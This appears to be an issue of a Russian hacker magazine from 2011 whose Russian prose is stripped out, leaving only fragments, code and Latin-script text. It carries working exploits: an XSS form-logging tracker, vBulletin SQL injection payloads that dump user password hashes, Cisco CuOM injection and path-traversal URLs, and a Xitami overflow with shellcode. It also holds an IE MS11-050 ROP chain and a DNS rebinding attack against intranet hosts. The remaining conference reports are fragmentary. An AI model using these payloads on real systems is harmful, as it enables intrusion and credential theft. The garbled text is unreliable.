
,
.
$('<iframe>').load(function() {
this.contentWindow; this.contentDocument;
});

.
$('body',this.contentDocument)
.find('a')
.click(function() {
log({event:'click', 'from': location, 'href': this.href,
'target': this.target});
})
.end()
.find('form')
.submit(function() {
log({event: 'submit',
from: location,
action: $(this).attr('action') || location,
fields: $(this).serialize()
});
})
.end();

, jQuery, . -
, . . ,
api.jquery.com/category/selectors.
, ,
password : lert(
$('input[name|="password"]').val());.
X 08 /151/ 2011

XSS-tracker iframe
. GET-:
function log(what) {
what["_"] = Math.random();
try {
$.get(logUrl, what);
} catch (e) {
var i = new Image();
i.src = logUrl + "?" + encodeURIComponent($.param(what));
$(i).load(function() {$(this).remove();}).appendTo("body");
}
};

. ,
, . :). .
1. - XSS- IE8 Chrome.
2. (XSS+iframe) frame busting. ,
. :).
3. , - - .
,
. , ,
web-, , :).
,
. .
, XSS-. ,
. HttpOnly +
HTML-.
. , .
XSS-. XSS-tracker,
. XSS-tracker
,
,
. XSS+CSRF. .
PS. aka D1g1 ( Security DVD) ,
:).
PS2.
Defcon-Russia (www.defcon-russia.ru). z

041


iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)

, -: Joomla,
vBulletin WordPress ( ) . , ,
, !

01

SQL- VBULLETIN 4.0.X =>


4.1.2

TABLE_PREFIX .
"$table AS $table WHERE $key IN (" . implode(', ', $id) . ")";
if ($rst = $vbulletin->db->query_read($sql))
{
while($row = $vbulletin->db->fetch_row($rst))
{
$names[] = $row[0];
}
}

CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
vBulletin x ,
CMS (vBulletin Publishing suite),
. J0hn.X3r
,
, .

, .
,
, . ,
.

if (count($names) > 0)
{
return $table_display . ': ' . implode(', ', $names);
}
}
else
{
//If we got here, we have a single value
if ($row = $vbulletin->db->query_first(
"SELECT $table.$fieldname from " . TABLE_PREFIX .
"$table AS $table WHERE $key = $id"))
{
return $table_display . ' ' .
self::getCompareString($comparator, $is_date)
. ' ' . $row[0];
}
}

EXPLOIT
. /vb/search/
searchtools.php getDisplayString:
public static function getDisplayString($table,
$table_display, $fieldname, $key, $id, $comparator, $is_date)
{
global $vbulletin, $vbphrase;
$names = array();

return "";
if (is_array($id))
{
$sql = "SELECT DISTINCT $table.$fieldname from " .

042

$id,
X 08 /151/ 2011

SOLUTION
.
,
, $id , :
$id = $vbulletin->db->sql_prepare($id);
if (is_array($id))
{

Cisco ,
. ,
, /packages/vbforum/search/type/
socialgroup.php, 201-203:
vB_Search_Searchtools::getDisplayString(
'socialgroupcategory', $vbphrase['categories'],
'title', 'socialgroupcategoryid',
$value, vB_Search_Core::OP_EQ, true ));

- . ?
,
social groups.
Live HTTP Headers Firefox, POST-.
,
search.php. Search Multiple Content
Types groups,
- ,
, team. POST- :
type%5B%5D=7&query=team&titleonly=1&searchuser=&ex
actname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=a
fter&sortby=relevance&order=descending&saveprefs=1&s=&securit
ytoken=1302542927-d4cf038925f1bba6869e060b837d651371f1c0e0&do
=process&searchthreadid=

SQL:
type%5B%5D=7&query=team&titleonly=1&searchuser=&ex
actname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=a
fter&sortby=relevance&order=descending&saveprefs=1&s=
&securitytoken=1302542927-d4cf038925f1bba6869e060b837d6513
71f1c0e0&do=process&searchthreadid=&cat[0]=1) UNION SELECT
'haxhax' #

!
haxhax. : , ,
, :
type%5B%5D=7&query=team&titleonly=1&searchuser=&ex
actname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=a
fter&sortby=relevance&order=descending&saveprefs=1&s=
&securitytoken=1302542927-d4cf038925f1bba6869e060b837d
651371f1c0e0&do=process&searchthreadid=&cat[0]=1) UNION
SELECT concat_ws(0x3a,username,password,salt,email) FROM
bulletinuser limit 1,1#

, John The Ripper, PasswordsPro -


, .
TARGETS
vBulletin Publishing Suite 4.0.0 4.1.2
vBulletin Forum Classic 4.0.0 4.1.2
X 08 /151/ 2011

. $id
, sql_prepare()
( , , ).
:
function sql_prepare($value)
{
if (is_string($value))
{
return "'" . $this->escape_string($value) . "'";
}
else if (is_numeric($value) AND $value + 0 == $value)
{
return $value;
}
else if (is_bool($value))
{
return $value ? 1 : 0;
}
else if (is_null($value))
{
return "''";
}
else if (is_array($value))
{
foreach ($value as $key => $item)
{
$value[$key] = $this->sql_prepare($item);
}
return $value;
}
else
{
return "'" . $this->escape_string($value) . "'";
}
}

02


CISCO UNIFIED OPERATIONS MANAGER
8.0 8.5

CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Cisco Unified Operations Manager (CuOM)
, .
. Sense of Security
: SQL-, ,
-. ,
CVSS
, SQL-,
7,5 10.

043

vBulletin

0c0c0c0c
EXPLOIT
1. CCMs PRTestCreation.do
SQL-, :
/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs=
'waitfor%20delay'0:0:20'--&Extns=&IPs=

ccm
TelePresenceReportAction.do:
/iptm/TelePresenceReportAction.do?ccm='waitfor%20
delay'0:0:20'--

2. XSS
Common Services Device Center,
:
/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)
</script>23fbe43447/iptm/logicalTopo.do?clusterName=
db4c1"%3balert(1)//4031caf63d7

SOS-11006, . Common Services


Framework Help Servlet, XSS:
/cwhp/device.center.do?device=&72a9f"><script>alert(1)</
script>5f5251aaad=1

3. - - CiscoWorks
Homepage,
-, .
,
:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\boot.ini
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\
classes\schedule.properties
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\
dbservice2\DBServer.properties
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\Program Files\CSCOpx\log\dbpwdChange.log

044

SOLUTION
CuOM 8.6 . Cisco, , : CSCtn61716, CSCto12704, CSCto12712
CSCto35577.

03

XITAMI WEB SERVER 2.5B4:

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Xitami web/ftp-, 1996
2000 iMatrix,
. . Xitami
,
.
, , -, web/ftp-.
exploit-db.com
Remote Exploits.
.
EXPLOIT
. :
#root@bt:~# cd Desktop/
#root@bt:~# ./Xitami2_5b4.pl
# Enter your target's IP (e.g.: 192.168.0.123)
# > 192.168.178.37
# [*] Sending the evil header at: 192.168.178.37
# [*] OK, exploitation Done!
# [*] Check please for the shell

, ,
. .
# msfpayload windows/exec cmd=calc.exe R | msfencode -e x86/
alpha_mixed -t perl
[*] x86/alpha_mixed succeeded with size 461 (iteration=1)
my $buf =
"\x89\xe2\xd9\xea\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"

.
.
.
.

X 08 /151/ 2011

push esp - retn, nop-


(
..., 0x00c8fee8):
00C8FEA4 00A27C57 W|. ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
00C8FEA8 004922F4 "I. ASCII "%s %d %d:%d:%d %d"
00C8FEAC 00C8FEE8 . ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

nop-
"\x75\x4a\x49\x49\x6c\x58\x68\x4c\x49\x45\x50\x43\x30\x43"
"\x30\x45\x30\x4b\x39\x4d\x35\x50\x31\x58\x52\x51\x74\x4c"
"\x4b\x43\x62\x54\x70\x4c\x4b\x50\x52\x54\x4c\x4c\x4b\x52"
"\x72\x45\x44\x4c\x4b\x51\x62\x45\x78\x56\x6f\x4c\x77\x50"
"\x4a\x54\x66\x56\x51\x49\x6f\x54\x71\x4f\x30\x4c\x6c\x47"
"\x4c\x51\x71\x51\x6c\x43\x32\x54\x6c\x51\x30\x4b\x71\x5a"
"\x6f\x54\x4d\x43\x31\x5a\x67\x58\x62\x5a\x50\x52\x72\x50"
"\x57\x4c\x4b\x56\x32\x54\x50\x4c\x4b\x50\x42\x45\x6c\x43"
"\x31\x58\x50\x4c\x4b\x43\x70\x51\x68\x4f\x75\x4f\x30\x43"
"\x44\x52\x6a\x45\x51\x5a\x70\x52\x70\x4c\x4b\x51\x58\x45"
"\x48\x4e\x6b\x43\x68\x45\x70\x47\x71\x49\x43\x4d\x33\x45"
"\x6c\x51\x59\x4c\x4b\x54\x74\x4e\x6b\x45\x51\x4b\x66\x54"
"\x71\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x5a\x61\x58\x4f\x56"
"\x6d\x47\x71\x5a\x67\x45\x68\x4b\x50\x54\x35\x4b\x44\x43"
"\x33\x51\x6d\x4b\x48\x45\x6b\x43\x4d\x47\x54\x50\x75\x5a"
"\x42\x43\x68\x4e\x6b\x50\x58\x47\x54\x45\x51\x5a\x73\x45"
"\x36\x4c\x4b\x56\x6c\x52\x6b\x4e\x6b\x56\x38\x45\x4c\x56"
"\x61\x49\x43\x4e\x6b\x47\x74\x4e\x6b\x43\x31\x5a\x70\x4c"
"\x49\x50\x44\x47\x54\x56\x44\x51\x4b\x43\x6b\x43\x51\x51"
"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x48\x51\x4f\x43"
"\x6a\x4e\x6b\x47\x62\x5a\x4b\x4f\x76\x43\x6d\x50\x6a\x47"
"\x71\x4c\x4d\x4e\x65\x58\x39\x43\x30\x43\x30\x45\x50\x52"
"\x70\x51\x78\x50\x31\x4c\x4b\x52\x4f\x4f\x77\x4b\x4f\x49"
"\x45\x4f\x4b\x4c\x30\x4c\x75\x4c\x62\x43\x66\x43\x58\x4c"
"\x66\x4c\x55\x4d\x6d\x4f\x6d\x4b\x4f\x4e\x35\x47\x4c\x43"
"\x36\x43\x4c\x54\x4a\x4b\x30\x4b\x4b\x4d\x30\x52\x55\x45"
"\x55\x4f\x4b\x50\x47\x52\x33\x51\x62\x50\x6f\x52\x4a\x43"
"\x30\x56\x33\x4b\x4f\x4b\x65\x45\x33\x50\x61\x52\x4c\x50"
"\x63\x56\x4e\x43\x55\x50\x78\x52\x45\x47\x70\x41\x41";

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

Xitami2_5b4.pl,
, , , ip .
.
_sscanf:

00C8FEB0
00C8FEB4
00C8FEB8
00C8FEBC
00C8FEC0
00C8FEC4
00C8FEC8
00C8FECC
00C8FED0
00C8FED4
00C8FED8
00C8FEDC
00C8FEE0
00C8FEE4
00C8FEE8
00C8FEEC
00C8FEF0
00C8FEF4

00C8FED8
00C8FEDC
00C8FEE0
00C8FEE4
00C8FED4
00A0F2A8
00A184DC
00000001
00000000
00000000
00000000
00000000
00000000
00000000
41414141
41414141
41414141
41414141

.
.
.
.
.
.
".
#...
....
....
....
....
....
....
AAAA
AAAA
AAAA
AAAA

AAAAA... , .
DEP,
. - push esp ret.
.
, , . push esp
ret :
$RET = "\x53\x2b\xab\x71";
# ws2_32.dll push ESP ret (Windows XP SP3 [En]).

:
$RET = "\x53\x2b\xa9\x71";

.text:0042A38D
.text:0042A38E
.text:0042A392
.text:0042A393
.text:0042A394
.text:0042A399
.text:0042A399
.text:0042A399
.text:0042A39A
.text:0042A39F
.text:0042A3A3
X 08 /151/ 2011

push eax
lea edx, [esp+7Ch+var_58]
push ecx
push edx
push offset aDSDDDD ; "%d %s %d %d:%d:%d"
loc_42A399: ; CODE XREF: sub_42A1F0+10B#j
push edi ; Src
call _sscanf; <---
mov ecx, [esp+8Ch+var_5C]
add esp, 20h


0x54,0xc3 (push esp retn), ImmDbg
pvefindaddr. pvefindaddr,
!usage pvefindaddr
ImmDbg.
ret,
0x71a92b53. retn, push esp retn, nop-,
.

045

Deveper Tools DOM,


<object> , , ,
, :


TARGETS
Xitami 2.5b4
SOLUTION

04

MS11-050 IE
MSHTML!COBJECTELEMENT USE
AFTER FREE

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Internet Explorer 7-8.
Metasploit.
use-after-free,
, <object>
,
.
Mshtml!CObjectElement,
. , mshtml!CDisplay <object>
,
, , , use-after-free.
EXPLOIT
Metasploit show options.
:
msf >
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
msf exploit() > set SRVHOST 192.168.0.63
SRVHOST => 192.168.0.63
msf exploit() > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit() > set CMD calc.exe
CMD => calc.exe
msf exploit() > exploit
[*] Exploit running as background job.
[*] Using URL: http://192.168.0.63:8080/b6t3wEBKj
[*] Server started.
msf exploit(ms11_050_mshtml_cobjectelement) >

(http://192.168.0.63:8080/
b6t3wEBKj) . ( IE ),

046

<html>
<body>
<script language='javascript'>
document.body.innerHTML += "<object align='right'
hspace='1000' width='1000'>TAG_1</object>";
// document.body.innerHTML += "<a id='tag_3' style='b
ottom:200cm;float:left;padding-left:-1000px; borderwidth:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style=
'font-size:1000pc;margin:auto -1000cm auto auto;'
dir='ltr'>TAG_11</strong>";
</script>
</body>
</html>

, ,
, :
0:008> k
ChildEBP RetAddr
020be350 63602718 mshtml!CElement::Doc+0x2
020be36c 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9
020be618 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44
020be628 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper
+0x11
020be638 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf
020be64c 637d29ab mshtml!CTreeNode::GetFancyFormat+0x35
020be654 637d2906 mshtml!CLineCore::AO_GetFancyFormat+0x23
020be688 63675c93 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
020bee80 6369985f mshtml!CDisplay::RecalcLines+0x6e4
020bef5c 6361c037 mshtml!CDisplay::WaitForRecalc+0x208
020befac 636514de mshtml!CFlowLayout::Notify+0x7d7
020befb8 636017f2 mshtml!NotifyElement+0x41
020bf00c 6365134f mshtml!CMarkup::SendNotification+0x60
020bf034 63666bc1 mshtml!CMarkup::Notify+0xd4
020bf07c 6361bf07 mshtml!CElement::SendNotification+0x4a
020bf0a0 635d82b7 mshtml!CElement::EnsureRecalcNotify+0x15f
020bf11c 635cc225 mshtml!CDisplayPointer::MoveUnit+0x2b2
020bf208 635cc092 mshtml!CHTMLEditor::AdjustPointer+0x16f
020bf23c 635cd2af mshtml!CEditTracker::AdjustPointerForInsert
+0x8b
020bf298 635cd123 mshtml!CCaretTracker::PositionCaretAt+0x141

, , ,
<object>
, . object
, , .
.
, IE
, use-after-free.
, <object>, , , ,
,
object .
IE7 IE8 DEP
CObjectElement 0c0c0c0c:
mshtml!CElement::Doc:
3cf76b80 8b01
mov eax,dword ptr [ecx]
; ds:0023:147f00a7=0c0c0c0c
X 08 /151/ 2011

0:007> u comctl32!CImageList::_IsSameObject+40 L?2


comctl32!CImageList::_IsSameObject+0x40:
773e3f18 94
773e3f19 c3

xchg eax,esp ; esp == 0c0c0c0c


ret ; kernel32!VirtualAlloc

ROP- :

CuOM
3cf76b82 8b5070 mov edx,dword ptr [eax+70h]
; ds:0023:0c0c0c7c=0c0c0c0c
3cf76b85 ffd2
call edx
; {<Unloaded_sspc.dll>+0xc0c0c0b (0c0c0c0c)}
; <-- ( nops + shellcode)
3cf76b87 8b400c mov eax,dword ptr [eax+0Ch]
3cf76b8a c3
ret

IE8 DEP
ROP-:
1. CObjectElement 0c0c0c0c;
2. heap-spray, ROP-
0c0c0c0c;
3. 0x23000000 nops+shellcode.
, ROP-
:
0c0c0c0c 7c809af1 ; 1:kernel32!VirtualAlloc ( )
0c0c0c10 7c901db3 ; 2:ntdll!memcpy ( )
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_
COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode ( )
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
0c0c0c34 be9e2688 ;
...
0c0c0c74 de2f62e1 ;
0c0c0c78 a19314eb ;
0c0c0c7c 773e3f18 ; comctl32!CImageList::_IsSameObject+0x40
;
0c0c0c80 3825a2d7 ;
0c0c0c84 88f8a84d ;
0c0c0c88 0566b421 ;

mshtml!CElement::Doc :
mshtml!CElement::Doc:
3cf76b80 8b01
mov eax,dword ptr [ecx]
; ds:0023:35a00002=0c0c0c0c
3cf76b82 8b5070 mov edx,dword ptr [eax+70h]
; ds:0023:0c0c0c7c=773e3f18
3cf76b85 ffd2
call edx ;
; {comctl32!CImageList::_IsSameObject+0x40 (773e3f18)}

ROP-
, esp eax (0c0c0c0c):
X 08 /151/ 2011

0c0c0c10 7c901db3 ; 2:ntdll!memcpy


( )
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_
COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode ( )
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size

kernel32!VirtualAlloc 0x4000
// 0x7f000000, ntdll!memcpy.
:
0c0c0c24
0c0c0c28
0c0c0c2c
0c0c0c30

7f001000
7f001000
23000100
00002fff

;
;
;
;

3:nops+shellcode ( )
2:memcpy:dst
2:memcpy:src
2:memcpy:size

ntdll!memcpy 0x2fff 0x23000100 (


nops + shellcode)
0x7f001000 (rwx-, VirtualAlloc)
nops + shellcode,
0x7f001000:
ntdll!memcpy:
7c901db3 55
push ebp
7c901db4 8bec
mov ebp,esp
7c901db6 57
push edi
7c901db7 56
push esi
7c901db8 8b750 cmov esi,dword ptr [ebp+0Ch]
; ss:0023:0c0c0c2c=23000100
7c901dbb 8b4d10 mov ecx,dword ptr [ebp+10h]
; ss:0023:0c0c0c30=00002fff
7c901dbe 8b7d08 mov edi,dword ptr [ebp+8]
; ss:0023:0c0c0c28=7f001000
...
7c901de6 f3a5
rep movs dword ptr es:[edi],dword ptr [esi]
; nops+shellcode 0x7f001000
...
7c901f4d c9
leave
7c901f4e c3
ret
; 7f001000 (
; nops + shellcode)

TARGETS
Internet Explorer 7-8
SOLUTION
. z

047


, Digital Security (twitter.com/asintsov)
, ESET (twitter.com/matrosov)

CONFIDENCE 2011

CONFidence
. ,
,
.
,
.
:

CONFidence 20-
. IT-security ,
-
( Black Hat, HITB, HashDays, SOURCE, BruCon, DeepSEC).
,
, , ,
, .
, ESET
.
, CONFidence
. , ,
.

048

, :
, , , ,
:).
, 1901 ,

.
, . , :
, (, ),
( ,
). , X 08/151/ 2011

ESET TDL4
, ,
, , .
- , :
...
,
- :). ,
CrackMe ReverseMe Tipping Point
IPS. , ESET

. , ,
.
(2011.
confidence.org.pl/misc/CrackMe/force64.ex_). ,
,

, .
, CONFidence 2011 ,

. ,
, .


Your Network Security Starts at Layer Zero
: ,
, -, . --
. , ,
, ,
. , , .
, ,
? ,
X 08/151/ 2011

,
? ,
. ,
,
,
( , , ), - ,

, .
, ,
.
, ,
, , :).
, , Ekoparty, . (deviating.
net/lockpicking/equipment.html) , , ,
,
. ( ) ,
!
:
,
. Renderman, , Defcon.
(, , ),
.

DVD
dvd

CONFidence 2011

DVD.

: SVG
The forbidden image Security impact of Scalable
Vector Graphics on the WWW
:

049

Digital Security

SVG. ( PHP-IDS
) SVG, ,
XSS, .
, , ,
(, , , IDS
WAF).

: Angry Birds
Hacking a Bird in the Sky: The Revenge of Angry Birds
: , Nobody
, ,
. , . ,
, : ,
(, ,
, WinNT 4.0 ), IP- (
, - , ,
, ). ,
,
,
: TDMA . ,
( ,
, ) .
, ,
:). , IT-security ,
!
, .
:
, (
, , ).

Low Fragmentation
Heap
Modern Heap Exploitation using the Low Fragmentation Heap
:
( , , , PHD CTF ,

050

) . :).
Microsoft
. - , , , ,
Windows. IIS FTP,
, , (
EIP) .
LFH (Low Fragmentation Heap). , MS. ,
, FTP-,
LFH,
.
FreeEntryOffset, , , EIP.
, 5% , - .

x64: TDL
Defeating x64: The Evolution of the TDL Rootkit
: ,
TDL x64
(, PatchGuard),
MBR ,
!
, , TDL4, ,
. .
- TDL .

DNS
DNS for evil
:
DNS for evil, DNS-
C&C. ,
][.

Microsoft Windows
Escaping From Microsoft Windows Sandboxes
:
X 08/151/ 2011

Lockpicking - .
Verizone,
.
(, , ,
, ..), ,
, .
. , ,
, , , DEP ASLR. , ,
( ,
)
. .
. Google Chrome,

, Acrobat Reader, Flash,
Protection Mode IE8 :).
, ][
? ,
!

MC13224
Practical attacks on the Freescale MC13224 ZigBee SoP
:
, !
,
! .
MC13224,
,
.. (, Defcon 18). MC13224
32- ARM7, , 802.15.4 . ,

CONFidence?

,
.
( ),
. ,
( )
. ,
,

X 08/151/ 2011

: ,
? !
, JTAG- ?
. ,
... ! ...
. , bit.ly/kE5jHV. ,
, .
. ,
:).
: ...

Outro

, ,
, , BeeF.
( ) 2011.confidence.
org.pl/materials ( . ). ,
,
.
CONFidence, .
,
. . ,
. , , PHD
, ,
: ,
( Chaos Constructions
). . Defcon ( -),
,

. ! z

- .
. ,
, ,
.
,
. ,
. ,
CONFidence.
,
, , -
.

051

CTF

19
Positive Hack Days,
Positive Technologies,
CTF. 10 , ,
8
.

, ,
. , . .
,
.
, ,
.
. Positive Hack Days TF
, , .
,
CTF HackQuest. whitebox ( )
blackbox- ( ).
.
, , , -

052


.
, -, , ..,
CTF
,
.

,
,
,
.
.
,
, .
, , .
X 08/151/ 2011

,
. , ,
, , , .
, ,
.

.

, CTF, .
,

SCADA (, ).
, , ,

.
,
, .
PHD (Parallelepiped Habile
Deflective).
,

. ,
, , PHD
X 08/151/ 2011

,

.
. ,

.
,
. ,
...


-
() Plaid Parliament of
Pwning (PPP) 5
.
Leet More - , (
3 ).
HackerDom
, 2
.
CTF ,

:
CTF, .
PHDAYS CTF 2012
, .

.
,
, PPP
.
PPP ,
.
,

.

CTF.
CTF,
PHD CTF
,
. ,
.
PPP
,
PHDays,
.
CTF :
,
, CTF. ,
, -, , ,
.
.
,
,

.

053

,
Positive Technologies
- PHD
-.
?
,
.
,
-
.
, -
,
, ,
. ,
,
, , ,
, .
RusCrypto CTF.
Positive Hack Days
, ,
InfosecurityMoscow, Chaos Constructions, .
- PHD , 4 ?
Positive Hack Days. ,
,
, . ,
, .
, , , 4

054

.
,
. 70%,
. 30% , , . , ,
, , , , .
-
?
Positive Hack Days ,
, .
, .
PHD, ,
, , ,
, , . ,
, . , . , CTF
! CTF, PHD, CTF ,
, .
- ?
! ,
, , , ,
, .
, ,
.
- ?
CTF ,
. - , ,
. , ,
.
X 08/151/ 2011

- Defcon?

BlackHat Defcon,
,
. ,
.


, Cisco
,
-
. .

-
PHD, -
-?
PHD, , .

.
,
, ,
, . , ,
, , ,
- . . , .

- , ?
Positive Hack
Days! , . PHD ,
, , - .
( , ,
, ,
). ,
,
,
. ,
,
.
PHD, .

- Positive Hack Days .


, , ?
PHD.
, .
.
,
, PHD . ,

- PHD

. ?

Positive Hack Days 4 . , ,

. CTF Enterprise-,

X 08/151/ 2011

, . ,
, ,
,

R&D
. ,
, ,
,
. ,
Research & Development ,

,
.
,
, .
- PHD?
,
, Positive Hack
Days . ,
ositive
Technologies,
- , ,
.
, , ,
,
, -
, . z

055

DNS REBINDING

Same origin policy


,
, Same origin policy.
,
, .
POST-
javascript css.
, .

, , .
,
( CSRF-),
, . , , CSRF-,
. ,
( ),
.
,
. - Outlook Web Access.
Same origin policy Anti DNS pinning, DNS
rebinding. Anti DNS pinning -,
HTTP-
Host. , web- Apache
IIS .

056

, HTTP, web. , , API


SOAP, XML-RPC .

, -
, DNS-.
IP-. ,
. ( ) :
1) , .
2) DNS- IP-,
.
3) web- ( IP)
javascript.
4) Javascript
.
5) X 08/151/ 2011

Outlook Web Access



.
6) IP- (
DNS-) IP- .
,
evil.xxx, ,
IP- ,
IP- . , ,
- .
, .

, ,
WEB- DNS-,
, .
NS-
.
NS- , IP- . IP- , Javascript, , , IP-
.
, ,
(
), .
Bind 9.
IP- ,
--enable-fixed-rrset. , , ,
. bind9 , IP-.
named.conf.options, options :
rrset-oredr { order fixed; };
. dns.evil.xxx:
dns

A
A

97.246.251.93
192.168.0.1

, DNS- , dns.attacker.ru
IP- 97.246.251.93, , , 192.168.0.1.
,
.
X 08/151/ 2011

DNS ( Apache), .
iptables,
tcp-reset ,
TCP- . iptables
:
iptables -A INPUT -s [ IP-] -p tcp \
--dport 80 -j REJECT --reject-with tcp-reset

80- ,
, . :
1) dns.evil.xxx.
2) DNS- IP- .
3) ,
IP 97.246.251.93.
4) HTML- JavaScript.
5) , javascript
dns.evil.xxx.
6)
IP- .
7)
dns.attacker.ru , 97.246.251.93 RST, 192.168.0.1.
javascript GET/POST/HEAD-
, 97.246.251.93,
!

, , , .
? -, ,
,
- , .
,
. , /, .
,

057

DNS Rebinding
OWA
- online.
,
,
. , Same Origin Policy
, ,
AJAX-,
XMLHttpRequest.
,
(
) ,
(80- ).
, Same
Origin Policy. , JSONP,
, ( JSONP , web). , .

XMLHttpRequest ,
, .
.
,
setInterval,
,
, . .

, , . , .
IP- . -,

. -,

, . -,
IP-
(
).

058

IP- . , , IFRAME
onLoad.
Image onLoad , . ,
, setTimeout,
, , ,
.

:
1) -
IP-, onLoad
.
2)
.
3) /
.

.

CSS History Hack v 2.0

-, .
, javascript
, , .
, ,
javascript <a>
. ,
CSS.
, .
( IE8) ,
. ,
-. , :
var links = [
'http://192.168.0.1',
'http://192.168.1.1',
'http://10.1.1.1'
];

STYLE
CSS- :
A#id:visited { background:url('http://admin.evil.xxx:8080/
backonnect.php?url=http://192.168.0.1'); }
X 08/151/ 2011

basic-

Cisco

, , ,
url, , url .
,
, .

2)
.
3) DNS- ,
IP-. :

DNS rebinding ,

TCP handshake. ,
. , IE Firefox
200 OK , Opera
404 IP-.
, .
,
HTML-. , IP-
,
DNS.
, ip- 192.168.0.1
192.168.0.1.dns.evil.xxx. http://
dns.evil.xxx/control.html iframe,
, DNS Rebinding, , ,
http://192.168.0.1.dns.evil.xxx/rebinding.html.
,
- ,
.
: , , :).
,
, ip- , . .
:
1) ip- (, 97.246.251.93).

iptables

X 08/151/ 2011

97.246.251.93.dns.evil.xxx

A
A

97.246.251.93
192.168.0.1

4)
src- IFRAME.
5) , 192.168.0.1.evil.xxx .
6)
, 80- .
7)
.
8) ,
.
9)
, 80- .
10) ,
.
DNS-
DNS, ,
nsupdate. DNS-
.

DNS
Rebinding

,
, :
1) . -
VirtualHost _default_, *:80 .
2) -.
, ,
, Host HTTP ,
.
3) NOSCRIPT ,
JavaScript, Java-
Flash-.
4) , , ,
, .
, API,
. , API
Amazon EC2, VMware ESX. z

059


(twitter.com/ABazhanyuk, CISS Research Team)
(twitter.com/NTarakanov, CISS Research Team)

0DAY


. , :
PHD
. Safari (
0day Windows),
.

, ?
:
Windows Internet Explorer (6/7/8)
Mozilla Firefox (3*/4*)
Google Chrome
Safari
Opera
Opera Mini
Netscape Navigator
Midori
Skyfire
Dolphin
Konpueror
Dooble
OpenSource-:
Chrome, Firefox Konqueror.
(engine-). :
Amaya
Gecko
HTMLayout
KHTML
Presto
Prince

060

Trident
WebKit
, Chrome Safari OpenSource- WebKit,
Firefox Gecko. JavaScript
, , , Google
V8 ( Rhino SpiderMonkey). , flash, jre (
) .

, .

, cross_fuzz . Google
-, .
(bit.ly/lbgfqm)
Internet Explorer, Firefox, Opera,
WebKit. ( ,
) !
cross_fuzz .

DOM-, . ,
X 08/151/ 2011

INFO

info


,
Selenium
(seleniumhq.org).

,


.

IE8


Safari

HTTP://WWW

. Safari
User mode write access violations that are not near
NULL are exploitable, eip.

links
JS
(DOM) :
www.webdevout.net/
browser-supportecmascript.

and dword ptr ds:0BBADBEEFh, 0


xor eax, eax
call eax

:
heideri.ch/jso.

- , ,
Webkit CRASH(). - ,
. CRASH
, -
- ,
.

,
-
. ,
.
,
:). cross_fuzz HTML/
JavaScript (lcamtuf.coredump.cx/cross_fuzz),
HTML-
( )
. ,
.
( /targets
mersenne.js/logo.jpg).
popup .

:
Firefox 3.6.16;
Firefox 4.0.1;
Chrome 10;
Internet Explorer 8/9;
Safari 5.0.5.
X 08/151/ 2011


,
,
..:
www.quirksmode.org.


HTML-
.
, cross_fuzz Safari,
5 .
Firefox 3.6.16 15-30
.
DEP.
use-after-free, .
,
3-5 . Chrome . IE
, , .
:
,
, . ,
,
? ,
, .
Cross_fuzz DOM,
.

,
Sandbox
Chrome: dev.chromium.org/developers/
design-documents/
sandbox.

061

cross_fuzz HTML/JavaScript


DOM. , .
,
. , , .
cross_fuzz return LOG(message).
, ,
cross_fuzz .
, cross_fuzz .
, , Firebug
Firefox. - JS
:
try {
console.log('eval %s',name);
